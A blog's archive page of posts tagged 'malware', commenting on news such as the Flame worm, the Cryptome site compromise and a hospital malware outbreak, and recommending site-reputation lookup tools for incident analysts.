I can't believe that came from your mouth!
Posts tagged malware
Flame On! New Advanced Stuxnet-Type Worm Infects Middle East
May 29th
Who’s up for more Stuxnet-style cyber attacks against Persia? Me, that’s who.
From FoxNews here:
Computer malware described as “the most sophisticated cyber weapon yet unleashed” has been uncovered in computers in the Middle East and may have infected machines in Europe, according to reports from antivirus researchers and software makers in Russia, Hungary and Ireland.
The malware, dubbed Worm.Win32.Flame, is unusual in its complexity, size and the multitude of ways it has of harvesting information from an infected computer including keyboard, screen, microphone, storage devices, network, Wi-Fi, Bluetooth, USB and system processes.
The malware is called “Flame” by Kaspersky Labs, but also known as sKyWIper by the Hungarian Laboratory of Cryptography and System Security (CrySyS Lab). Both Kaspersky Labs and CrySyS Lab said it was likely the malware was developed by a government-sponsored entity.
Although the virus has just been detected, there was evidence that it may have been in operation for at least two years.
Vitaly Kamluk, chief malware expert for Kaspersky Labs, said there were many pointers to it being a weapon, not the least of which was how highly-targeted it was. According to their investigations, only 382 infections have been reported, 189 of which were in Iran, and the malware targeted individuals rather than organizations.
Kamluk said the malware was most likely introduced by a USB stick or other removable drive. Once injected, the malware would contact one of the many command and control servers around the world and download additional modules as needed.
Whee! I haven’t seen the code snippets, but McAfee’s blog lists its capabilities here.
Skywiper is a modular, extendable and updateable threat. It is capable, but not limited to the following key espionage functions:
- Scanning network resources
- Stealing information as specified
- Communicate to C&C Servers over SSH and HTTPS protocols
- Detect the presence of over 100 security products (AV, Anti-Spyware, FW, etc)
- Both kernel and user mode logic is used
- Complex internal functionality utilizing Windows APC calls and and threads start manipulation, and code injections to key processes
- It loads as part of Winlogon.exe then injects to Explorer and Services
- Conceals its present as ~ named temp files, just like Stuxnet and Duqu
- Capable of attacking new systems over USB Flash Memory and local network (slowly spreads)
- Creates screen captures
- Records voice conversations
- Runs on Windows XP, Windows Vista and Windows 7 systems
- Contains known exploits, such as the Print Spooler and lnk exploit found in Stuxnet
- Uses SQLite Database to store collected information
- Uses custom DB for attack modules (This is very unusual, but shows the modularity and extendibility of the malware)
- Often located on nearby systems: a local network for both C&C and target infection cases
- Utilizes PE encrypted resources
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!)
Loading ...
Cryptome.Org Hacked- Hosted Scripts for Drive-By Malware UPDATE! Javascript Captured
Feb 14th
Cryptome.Org was compromised by some type of PHP vulnerability, adding a download script to each of its pages on the webserver. The compromised pages produced the following AV alerts to visitors- click the photo to embiggen:
Cryptome confirmed each page had been modified here:
(13 Feb 2012) 5,000 more files found infected, still checking, but it looks as though every HTML file on Cryptome was infected. Sneaky: files inside directories and sub-directories were changed to add the SCRIPT with date of change but without changing the directory date. Not clear how access was gained through our ISP. Access logs do not show the infection activity. Any ideas how that was done and how to prevent recurrence: cryptome[at]earthlink.net
ArsTechnica goes on to report that Cryptome seems to think they were breached via the PHPmyadmin configuration page on their server.
A breach that caused Cryptome.org to infect visitors with virulent malware was one of at least six attacks reported to hit high-profile sites or services in the past few days. Others affected included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.
Cryptome, a repository of leaked documents and other information concerning free speech, privacy and cryptography, was attacked by hackers who left code on its servers that attempted to infect visitors using Windows PCs with a trojan spawned by the Blackhole Toolkit, the website reported on Sunday.
Cryptome founder John Young said in an e-mail that he believes the attackers were able to infect his website with a poisoned PHP file by exploiting a weakness in security or server software provided by Network Solutions, which hosts the Cryptome website.
If Cryptome was running a standard type of PHP enabled blog, such an attack would be a bit easier- a PHP based attack can compromise the mysql database and the malcode could be easily injected onto each page. But Cryptome doesn’t use PHP. Perhaps they actually do have PHP, but only as an addon available via their webserver administration console software.
The last time Cryptome was hacked, the name of Justin Perras came up- he was jailed for the Lexis Nexis hack back in the day.
Thanks to @AoSHQ Doom.
UPDATE!!
Coincidentally enough, I began to receive AV popups of my own related to the Blackhole malware. My AV of choice is the excellent Microsoft Security Essentials.
I examined the details and found out that one of my RSS feeds that I track was prepending a malicious script to RSS feed page that is served by Internet Explorer. I carved out the script and submitted it to Jsunpack. As is often the case, jsunpack didn’t detect the decoded javascript as malicious, but reading through the eval commands, it is clear that the software attempts to insert an iframe and create a drive-by download. Below is the decoded javascript. Click the image to embiggen.
It is also worthy to note that this threat employs dynamic DNS to prevent anyone from simply blackholing the IP address. And if the threat is widespread enough to begin to infect the RSS feeds of popular blogs, this one is going to be a big deal in the security sector in the next several weeks.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...
This is What Happens When You Refuse to Upgrade From XP
Dec 12th
Way too many of the customers I interact with are still stuck using Windows XP, an operating system that came out when the Twin Towers were still standing in New York. And even though they purchase 64 bit computers with large amounts of ram, they don’t utilize that power, and stick with the 32Bit image they have standardized on for over a decade. They spend a huge fortune on defense in depth to protect what they know to be an inferior operating system, and much of that defensive procurement would be rendered unnecessary if they went with a hardened endpoint operating system.
Sticking with WinXP and IE7 is a powder keg of a disaster waiting to happen. Just take a look at an Atlanta Hospital that just risk-managed their way into having to do without their computer network which is maggoty with malware, botnets and virii. From the AJC here with thanks to RSA:
Ambulances turned away as computer virus infects Gwinnett Medical Center computers
Gwinnett Medical Center on Friday confirmed it has instructed ambulances to take patients to other area hospitals when possible after discovering a system-wide computer virus that slowed patient registration and other operations at its campuses in Lawrenceville and Duluth.
The health system has been forced to switch back to paperwork.
Patients were waiting longer at registration on Friday, and the virus also was affecting departments such as the pharmacy, radiology and labs. A system of runners are dealing with a variety of tasks, such as running orders down to the pharmacy or delivering X-rays to doctors.
A hospital taken down by malware and an overcautious risk management team.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...How Ad Agencies Prevent Driveby Malware Ads
Aug 9th
On of the most effective ways to distribute malware to unsuspecting users is to poison the advertising banners used by some of the most popular websites on the Internet. The malware author’s ad would take advantage of local browser weaknessses to inject trojan software or otherwise compromise the system. If a malware author could get his malware to be delivered to everyone visiting Gawker for instance, it could represent thousands of compromised systems before anyone could react and remove the ad.
When malware authors first started using this metholdology, many of the ad agencies each had to learn the hard way that advertisers weren’t always who they claimed they were. Lots of background checks were put into place to prevent these criminals from placing bogus infected ads- credit checks, investigation into domain registration, business history, references- and still some bad guys kept breaking through.
Many ad agencies had their reputations thrashed because they unwittingly enabled the compromise of thousands of systems, so it was in their best interest to protect the cyber community by vetting their clients as well as they could.
This article here at MediaPost provides a great web advertising insider’s account of dealing with very clever malware authors who were creating shell companies specifically so they could get their ad banners on their ad network.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...Safe Browsing Tips- How Safe Is That Website?
Sep 8th
I have spent lots of hours in the Analyst’s chair pouring over IDS/proxyserver/SEIM logs and alerts, and trying to piece together intrusions based on scant evidence available. So any utility or tool that helps me understand the likelihood of a successful compromise of a victim host is helpful. For instance, if you have an alert that someone visited a website and encountered a possible malicious shockwave flash file or unusual java script- how do you determine how likely the victim was to be compromised? Here are two great free tools that can help.
First up is SiteAdvisor, a site I have blogged about in the past.
SiteAdvisor was purchased by McAfee a few years ago, and is a great analytical tool to help determine how likely someone was to have been compromised by providing the ability to search for potentially malicious domains via its web interface. On the right hand side of the SiteAdvisor homepage is a search box. Simply type in the name of the site, such as Belch.Com or your own domain, or the potentially malicious site in question and click on the view report now link. The primary site will appear in the center along with any links to potentially malicious sites. If malware is known to exist on the website, it lists what type of malware it was. For example, check out the report to iask.com here.
You get a report that looks like this, that shows the banking trojan download and the other sites that link to this page to retrieve malware. You can simply click on one of the linking sites to view the report from that site as well. If the victim host you are investigating had visited a site such as this, chances are much higher that the host could be compromised compared to someone visiting a “green” site.
Next up is Google’s Safe Browsing Diagnostic Tool.
This is not a utility that is available for general use through a Google Homepage, but the tool is simple enough to use. Simply paste this url into your browser and save it:
http://www.google.com/safebrowsing/diagnostic?site=iask.com
Now only change the query behind the “site=” string to the site in question to see if the site is currently hosting malware or has hosted any in the past 90 days. You will notice in this example on this date that the iask site is not hosting any malware, and hasn’t for 90 days. But if you click on any of the AS links, you will see what that network has been known to host for 90 days, as well as sample known malicious sites. Give it a try for Belch.Com or for your own site.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...Conficker, Schmonficker. Thumbdrive Worms and Rogue Antivirus Are Real Threats
May 11th
I haven’t written very much about the Conficker virus on this page except to note that it caused France to ground their fighter jets. I didn’t write about it because, despite the hype and the dreaded April First doomsday threat that never materialized, I just haven’t been seeing it play out very much in the field. Yes, the conficker virus was apparently written by an advanced malware author or more likely, a team of authors, but the threat is largely nullified by simply patching your Windows system. If anything, the fact that the threat was never bigger is a testament to how far Microsoft has come with managing their patch delivery to their customers.
But according to McAfee, the real threat out there is not Conficker. Its people sticking their thumb drives everywhere and either getting infected or leaving an infection. As the chart above indicates, the number of infections of conficker versus thumb-drive virus “sneaker net” distribution is stark.
McAfee also notes that hackers are getting really good at gaming Google’s keyword searches to drive users to compromised hosts in order to install rogue antivirus software, which is actually malware. This information is from their quarterly threat report. You can read the whole report here.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...Evolution of Malcode Criminals
Nov 21st
The guys who write viruses and malware aren’t the mischief makers or yore. The bad guys have figured out that the best way to get their malware removed from an infected system is to make the malware be noisy- send out tons of spam, flood the network with packets, and make the host almost unusable for its owner. Within short order, the host is repaired, or flattened and reloaded. Now the bad guys are being quiet, and infections are on the rise and more and more criminals are making money from their malware. Mikko Hyponen from F-Secure has this outstanding video explaining how malware has evolved from trojan horse attachments in email to drive-by downloads that finance international terror.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...F-Secure’s 2008 Security Overview
Jun 25th
Mikko Hypponen of F-Secure is in this video below describing some of the coolest threats discovered on the Internet in the first half of 2008. Much of it has been covered on this blog before regarding phishing attacks and malware backdoors. But one of his statements near the beginning caught me way off guard and was a bit shocking.
The unrest in China over Tibet has prompted some very targeted malware attacks against Pro Tibet groups. Since many of those humanitarian and human rights groups knew that their email communication was constantly being monitored by China, they had switched to encrypted email- specifically, PGP. Mikko tells a story about how some of the tarteted malware attacks against the pro-tibet groups were designed to steal the public and private PGP keyrings! Since the Chinese can’t crack PGP on their own, but assuredly have copies of the encrypted transmissions, they targeted and stole the PGP keys to decrypt the emails of the dissidents and human rights groups.
Wow.
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...Bhutto Assassination Video Trojan
Dec 28th
There are lots of websites out there taking advantage of the Bhutto Bombing to spread malware and trojan horse attacks. According to McAfee, some are posing as video codecs hosted on Blogspot sites.
From McAfee here:
Within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.
Claiming to be a New HD Codec, these malware authors attempt to social engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites are observed to be hosting this fake video.
Google should be able to do so much more to prevent their servers from hosting malware. Its real easy to tie a search engine to a cross reference database of known malware links or AV signatures. They don’t have to do it for all websites they index, but they certainly should do it for their own domain.
Like This Post? Rate it and tell your friends! Click the Share button below.
(1 votes, average: 6.00 out of 6) Loading ...Content Filters for Security
Nov 7th
Kiltak at [GAS] Geeks Are Sexy has invited me to guest bog at his site! You can check out how to use content filtering for blocking malware over at that site here. Be sure to check it out!
Like This Post? Rate it and tell your friends! Click the Share button below.
(No Ratings Yet. Rate It!) Loading ...
